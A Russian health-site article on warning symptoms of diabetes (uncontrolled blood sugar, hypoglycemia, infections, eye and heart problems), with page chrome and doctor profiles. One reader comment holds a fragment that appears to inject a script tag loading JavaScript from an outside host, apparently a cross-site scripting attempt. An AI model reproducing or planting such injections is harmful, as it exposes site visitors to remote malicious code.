Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Симптомы, которые нельзя ...  >>  Симптомы, которые нельзя игнорировать больным диабетом
 
Обратная связь
 

Симптомы, которые нельзя игнорировать больным диабетом

Размер шрифта
15 февраля 2011 00:00
  • google_analytics: false
  • Нравится

Болезни сердца, недостаток сахара в крови, инфекции, проблемы с глазами, и многие другие недуги могут осложнить состояние больных диабетом. Люди с таким диагнозом, как правило, умеют управлять своим заболеванием посредством правильного питания, регулярных физических упражнений и лекарств. Однако, масса факторов, кроме питания и спорта, могут повлиять на уровень сахара в крови – болезнь, стресс, спиртное, и даже менструальный цикл.

Частое мочеиспускание, сильная жажда, нечеткое зрение

Частое мочеиспускание, сильная жажда или голод, нечеткое зрение – три признака неконтролируемого сахара в крови. Обнаружив любой из этих симптомов, вы должны проверить свой уровень сахара в крови и немедленно обратиться к врачу.

Если их не взять болезнь под контроль, высокий уровень сахар в крови может привести к серьезным, опасным для жизни последствиям.

У пациентов с диабетом 1 типа может развиться диабетический кетоацидоз, который развивается, когда организм начинает вместо сахара расщеплять жиры, при этом происходит опасное накопление кетонов – побочных продуктов метаболизма жиров.

У больных диабетом 2 типа может развиться состояние гиперосмолярной комы. Это по сути неконтролируемый диабет, который приводит к обезвоживанию и состоянию измененного сознания, и в результате может закончиться смертью.

Усталость

О слишком низком уровне сахара в крови может говорить чувство усталости и измотанности. Может возникнуть ощущение, что вы не контролируете свою жизнь. Это происходит, когда лекарство для диабетиков имеет мощный эффект и действует сверх необходимой нормы.

Чашки сладкого чая с печеньем или сока обычно достаточно, чтобы поднять уровень сахара и нормализовать состояние. Однако бывает и такое, что страдающий диабетом не признает проблему. Если никто вокруг не подскажет вам, что нужно сделать, низкий уровень сахара в крови может привести к потере сознания.

Ряд препаратов обладающих продолжительным действием могут вызвать гипогликемию. Например, глибенкламид, или глимепирид. Инсулин длительного воздействия также может стать причиной понижения уровня сахара в крови. В таких случаях необходима экстренная медицинская помощь.

Инфекции, опухание и кровоточивость десен, язвы на ногах

Сразу обратитесь к вашему лечащему доктору, если у вас на теле есть инфицированные порезы, десны опухли или кровоточат, раны никак не заживают. Врач также должен внимательно осмотреть раны на ногах, если такие имеются поскольку это первый признак диабетической язвы стопы.

Все больные диабетом, должны регулярно проходить осмотр у своего врача на предмет язв на ногах. Каждый день стоит внимательно осматривать ноги самостоятельно, даже если повода для беспокойства нет. И помните, мыть ноги нужно ежедневно в теплой, а не горячей воде, затем обязательно нанести увлажняющий крем. Он поможет предотвратить сухость кожи.

Статистика говорит о том, что грибковые заболеваний кожи встречаются чаще у больных сахарным диабетом. Это происходит потому, что в результате гипергликемии нарушается способность белых кровяных телец реагировать на такие инфекции.

Покраснения, зудящая сыпь, особенно в кожных складках, может также сигнализировать о грибковой инфекции.

Проблемы со зрением

Если вы заметили внезапное изменение зрения, боли в глазах, пятна или плавающие белые круги, сразу же обратитесь к вашему врачу. Он направит вас к офтальмологу. Люди с диабетом подвержены такому заболеванию как ретинопатия, которое может привести к потере зрения.

Даже в отсутствии жалоб, больные сахарным диабетом должны посещать врача-офтальмолога каждый год для обычной проверки зрения.

Симптомы болезней сердца

Пациенты с диабетом наиболее подвержены сердечно-сосудистым заболеваниям, у них в два раза чаще, чем у других случаются инсульты и инфаркты.

Так что любой симптом болезней сердца не оставляйте без внимания. Опасения должна вызвать любая боль, даже если вас беспокоит плечо. Иногда о болезнях сердца может говорить тошнота. Но есть заболевания сердечно-сосудистой системы, которые не имеют очевидных симптомов, поэтому регулярно посещайте кардиолога, чтобы предупредить болезни.

Меры предосторожности

Александру поставили диагноз «диабет» 30 лет назад. Однажды ночью он ехал за рулем и почувствовал резкую боль в груди. Она была не похожа на мышечную боль. Ощущения длились всего несколько секунд, но вскоре это повторилось. Александр сделал кардиограмму, но обследование не выявило отклонений в работе органа.

Менее чем через неделю, Александр проснулся с сильным сердцебиением. Пульс был 90 ударов в минуту – выше чем обычно. Результаты повторной кардиограммы снова оказались нормальными. Но с учетом таких событий, кардиолог настоятельно рекомендовал следить за своим пульсом. В течение следующих двух недель показатель не раз падал ниже 40. Александр решил пройти полное обследование, которое в итоге показало, что сердце испытывало кислородное голодание. Потому что один из сосудов, питающих главный орган, был заблокирован. Сердечное зондирование подтвердило проблемы, но в то же время показало, что остальные сосуды в полном порядке и не требуют никакого лечения. У Александра случился сердечный приступ, о котором он даже не знал. Но кардиологи говорят, что подобные проблемы – не редкость для людей с диабетом. Это в очередной раз подтверждает, что неявные и необычные симптомы заслуживают пристального внимания и экстренной медицинской помощи.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

01 июля 2015 в 00:21

Комментарий удален за нарушение Правил общения

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.